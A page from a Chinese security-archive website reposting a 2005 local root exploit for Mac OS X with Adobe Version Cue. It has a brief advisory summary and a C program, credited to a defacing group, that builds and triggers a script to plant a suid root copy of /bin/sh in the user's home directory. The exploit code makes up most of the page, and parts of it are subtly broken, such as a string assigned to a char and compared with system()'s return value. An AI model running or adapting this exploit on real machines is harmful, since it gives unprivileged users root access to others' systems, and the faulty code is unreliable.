首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mac OS X / Adobe Version Cue Local Root
来源:www.Ashiyane.com 作者:ActionSpider 发布时间:2005-05-19  

Mac OS X / Adobe Version Cue Local Root (Exploit)

Summary
A vulnerability in Mac OS X when its bundled with Adobe Version Cue allows a local attacker to create a suid root shell with a non-privileged user. Adobe Version Cue is installed by default with virtually every recent Adobe product. This most likely affects many versions of Mac OS X and Adobe Version Cue.

Credit:
The information has been provided by ali reza AcTiOnSpIdEr .
The advisory can found at: http://www.securiteam.com/securitynews/6M00B0KC0U.html

Details
Vulnerable Systems:
* Mac OS X version 10.3.6 with Adobe products

Exploit:
/************************************************\
[ Mac OS X - Adobe Version Cue local root exploit ]
c version exploit
--=== by ActionSpider ===--
Iam sun-os hehehe ActionSpider@Linuxmail.org

[http://www.Ashiyane.com]
[http://www.Ashiyane.net]
[http://defacers.com.mx ]

*************************************************|
Greetz to: [ Behrooz & Nima & Ehsan & str0ke & Status-x & Mafia_Boy & stealh ]
&&
Greetz to: [ and all member of SegmentationFault Group
Code written By ActionSpider Mac OS X - Adobe Version [C] version Exploit;)
\************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

int main(){
int x =1;
char a= "root";

printf("\t[ Mac OS X - Adobe Version Cue local root exploit ]\n");
printf("\t\t--==Code written By ActionSpider==--\n");
printf("\t\t --=ActionSpider@Linuxmail.org=--\n");
printf("\t\t\t[ www.Ashiayne.com ]\n\n\n");

printf("w8 for geting root man...\n");
for (x=1;x<=75;x++){
printf("#");}

printf("\nyour id now:");
system("id");
printf("touch productname.sh...");
system("echo cp /bin/sh /Users/$USER; >> productname.sh");
system("echo chmod 4755 /Users/$USER/sh; >> productname.sh");
system("echo chown root /Users/$USER/sh >> productname.sh");
printf("chmod productname.sh 0755");
system("chmod 0755 ./productname.sh");
printf("ok w8 for touch link...");
system("ln -s $path/stopserver.sh");
printf("exection it :p hehe\n");
system("./stopserver.sh");
system("./sh");
printf("ok w8 for see system rooted or not \n\n");

system("id");
if (system("whoami") == a)
printf("\n\n ok system now rooted hehe...:P");
else
printf("sory this server is patch :(\n");
}

/* EOF */



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PhotoPost Arbitrary Data
·Fusion SBX Remote Command Exec
·Microsoft Windows XP/2003 IPv6
·MS SQL Server Passwords Brutef
·procps vmstat p Argument Local
·Mozilla Firefox view-source: P
·Linux kernel pktcdvd ioctl bre
·Mozilla Firefox view-source:ja
·Linux Kernel ELF Core Dump Pri
·Mozilla Suite and Firefox Scri
·Apache HTDigest Realm Command
·Multiple Vendor TCP Timestamps
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved